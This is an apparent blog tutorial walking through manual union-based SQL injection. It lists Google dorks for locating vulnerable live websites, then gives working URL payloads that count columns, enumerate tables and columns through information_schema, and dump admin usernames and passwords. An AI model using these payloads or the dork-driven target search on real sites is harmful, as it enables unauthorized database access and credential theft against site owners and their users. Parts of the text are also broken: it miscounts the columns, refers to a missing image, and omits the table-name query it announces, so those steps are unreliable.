SQL injection Union Based Manually Step by Step
Hello guys hope you were doing good in this tutorial we will discuss about basic SQL injection union based manually so first i would like to recommended you to learn the basic of SQL from w3schools. so lets me start from introduction.
What is SQL Injection ?
SQL Injection is a type of code injection vulnerability in database layer. A successfull sql injection exploit can read and modify the backend database. This vulnerability can be found when user input is incorrectly filtered for string.
What an attacker can do ?
- An attacker can Inject in website and can read and modify database.
- An attacker can take the control of your admin panel if you have.
- If the targeted website is E-commerce and website store the information then attacker can easily get.
- An attacker can shell and deface the website.
So lets start our work….
Find an SQL Injection vulnerable website with google dorks. Huge list of SQLI dorks click Here
inurl:index.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:shop.php?id=
Now you will have to check the vulnerability by adding single quote after id parameter and hit enter if you will get a error message like sql syntax error that means site is vulnerable to sql attack.
Now after checking the vulnerability if the site is vulnerable then you will have to find the number of columns by using order by statement.
www.vulnerablesite.com/index.php?id=1' order by 1 --+ [no error] www.vulnerablesite.com/index.php?id=1' order by 2 --+ [no error] www.vulnerablesite.com/index.php?id=1' order by 3 --+ [no error] www.vulnerablesite.com/index.php?id=1' order by 4 --+ [no error] www.vulnerablesite.com/index.php?id=1' order by 5 --+ [error]
Here i got the error message in order by 5 that means the total number columns are 5.
Now we will the vulnerable column using union command
www.vulnerablesite.com/index.php?id=1' union select 1,2,3,4 -- +
As you can see in the above image vulnerable column is 2 following things we will use this commands.
Version - @@version also version() Database- database() Current User - user()
Step 5 :
Now we will find the table name just paste this query in vulnerable column given below.
we will find the column names of particular table just use this query.
www.vulnerablesite.com/index.php?id=1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name= [table name in hex]
yeah now we got column name of table name and our next target is to dump data.
Now we got database,table name and column name as well so we will dump database of the targeted website. just replace column_name with the target column for example. admin, user e.t.c and add in last from targeted table.
www.vulnerablesite.com/index.php?id=1' union select 1,group_concat(username,0x3a,password),3,4 from admin--+
yeah we got the username and password.
keep practising but don’t harm any site…